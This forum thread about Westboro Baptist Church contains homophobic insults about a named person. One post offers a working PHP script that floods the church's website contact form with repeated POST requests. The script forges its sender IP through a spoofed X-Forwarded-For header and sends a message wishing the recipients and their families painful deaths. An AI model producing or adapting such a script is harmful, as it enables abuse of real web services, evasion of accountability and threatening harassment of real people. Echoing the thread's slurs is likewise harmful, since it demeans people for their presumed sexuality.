• Howdy! Welcome to our community of more than 130.000 members devoted to web hosting. This is a great place to get special offers from web hosts and post your own requests or ads. To start posting sign up here. Cheers! /Peo, FreeWebSpace.net
managed wordpress hosting

Westboro Baptist Church should loose its charity status!

Freds daughter had a child out of wedlock, one set of rules for them and another for everyone else... this guy, Fred is as ----ing queer as they come, it's so blindingly obvious that the guy is supressing some powerful homosexual tendencies ....
 
Lol, They probably wouldn't even read it :D

PHP:
<?php
set_time_limit( 0 ) ;
error_reporting( 0 );
function mail_wbc( $message, $times = 10, $sleep = 10 )
{
    $written = 0 ;
    
    foreach( array(
        'to' => 'Questions/Comments',
        'email' => 'lucifer@youwillburn.com',
        'name' => 'St. Lucifer',
        'subject' => 'Appointment with the damned',
        'referrer' => '666://fellfromgrace.com',
        'regarding' => '',
        'message' => $message
    ) as $key => $value ) $body[ ] = sprintf( "%s=%s", $key, urlencode( $value ) );
        
    $body = implode( '&', $body );
    
    
    $request = array(
        "POST /cgi-bin/ghacontact.pl HTTP/1.0",
        "Host: godhatesamerica.com",
        "X-Forwarded-For: 70.184.229.62",
        "Content-type: multipart/form-data",
        "Connection: close",
        sprintf( "Content-length: %s", strlen( $body ) ),
        "",
        $body
    );
    
    do{
        if( ( $sock = fsockopen( "www.godhatesamerica.com", 80, $errno, $errstr, 5 ) ) )
        {
            if( fwrite( $sock, implode("\r\n", $request ) ) )
                printf( "\rWrote message %d %s sleeping for %d seconds", ++$written, $written > 1 ? "times" : "time", $sleep );
            else
            {
                echo $errstr ;
                fclose( $sock );
                break ;
            }
            if( $times and $sleep ) sleep( $sleep );    
        }
        else
        {
            echo $errstr ;
            fclose( $sock );
            break ;
        }
    }
    while( --$times );
    print("\r\n");
}
mail_wbc( "You suck; the human race hopes you and your family die horrible painful deaths" );
?>

who said that ??
 
Back
Top